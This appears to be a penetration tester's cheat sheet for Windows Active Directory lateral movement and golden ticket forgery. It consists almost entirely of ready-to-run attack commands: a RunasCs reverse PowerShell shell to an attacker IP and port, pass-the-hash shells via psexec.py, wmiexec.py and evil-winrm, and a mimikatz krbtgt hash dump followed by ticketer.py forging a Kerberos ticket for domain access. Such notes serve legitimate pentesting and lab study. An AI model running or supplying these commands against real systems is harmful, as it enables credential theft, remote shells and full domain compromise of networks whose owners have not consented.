Lateral movement

// pivot locally
RunasCS : https://github.com/antonioCoco/RunasCs/tree/master

PS C:\Users\svc_apache\Desktop> .\runas.exe <user> <password> powershell -r <ip>:<port>
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-59b6e$\Default
[+] Async process 'powershell' with pid 2380 created and left in background.
// Get a shell on the remote machine passing the hash
psexec.py '<domain>/<user>@<domain-ip>' -hashes '<ntlm_hash>'  cmd.exe
// Get a shell on the remote machine passing the hash (over WMI instead of SMB/psexec)
wmiexec.py '<domain>/<user>@<dc-ip>' -hashes '<ntlm_hash>' cmd.exe
// Get a shell via WinRM with credentials - port 5985
evil-winrm -u "<user>" -p "<password>" -i "<machine or dc ip>"
// Get a shell via WinRM with hash - port 5985
evil-winrm -u "<user>" -H "<ntlm hash>" -i "<machine or dc ip>"

Golden ticket

// ON WINDOWS MACHINE
mimikatz.exe
lsadump::lsa /inject /name:krbtgt
// Copy all the dumped data, as shown in the image.
ticketer.py -nthash <ntlm_hash> -domain-sid <domain-sid> -domain <dc-name> <username-to-impersonate>
export KRB5CCNAME="<FULL-PATH-TO-CCACHE-FILE>"
psexec.py -n -k <dc-name>/<user>@<computer-name> cmd.exe
